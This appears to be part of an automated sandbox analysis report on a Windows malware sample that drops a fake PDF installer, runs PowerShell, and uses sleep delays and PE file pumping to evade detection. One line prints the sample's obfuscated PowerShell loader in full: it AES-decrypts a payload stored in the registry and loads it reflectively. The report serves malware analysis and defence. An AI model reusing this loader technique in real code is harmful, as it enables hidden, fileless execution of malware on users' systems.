      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Detected PE file pumping (to bypass AV & sandboxing)
      Source: i2wBlKtxrM.exeStatic PE information: Resource name: RT_RCDATA size: 0x6b02e00
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 5388Thread sleep count: 9107 > 30Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 3796Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 3840Thread sleep count: 32 > 30Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 3796Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 25292Thread sleep count: 8701 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 40820Thread sleep count: 8542 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 78240Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeWindow / User API: threadDelayed 9107Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8701Jump to behavior
      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 899
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8542
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8671
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000011.00000002.22551399134.00000221AA0DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls"U
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000011.00000002.22320458549.0000022191FF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeMemory allocated: page read and write | page guardJump to behavior
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -command "$a=new-object system.security.cryptography.aescryptoserviceprovider;$a.key=@([byte]3,173,118,126,231,161,139,192,229,141,204,156,132,100,48,106,235,67,30,141,248,153,154,213,216,50,229,134,16,171,109,238);$a.iv=@([byte]201,234,4,140,115,200,164,199,43,168,227,197,101,4,86,9);$f=(get-itemproperty 'hkcu:\software\classes\rfg1dcnqkaz').'(default)';[reflection.assembly]::load($a.createdecryptor().transformfinalblock($f,0,$f.length));[kemcid76hlg1vs2opa8cqjgckrcqhxczjexlew2lxjrumleqnphpryotm9lbu6vtunojb72jkixzx3sswfgvtdwcsszecxsogc.k71mr3w83p167odlfs1wny2afqytql9bufz4zvpo0mceu64ndeff]::keqmis3ck5upwc0wnjhou0kdkh_ib1('cw2tm3bl19p97xcm5ku1reej00x0iviu');
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe "C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe" Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drBinary or memory string: Shell_TrayWndKillProcessesUsingInstallation()
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\Users\user\Desktop\i2wBlKtxrM.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.906.cat VolumeInformation
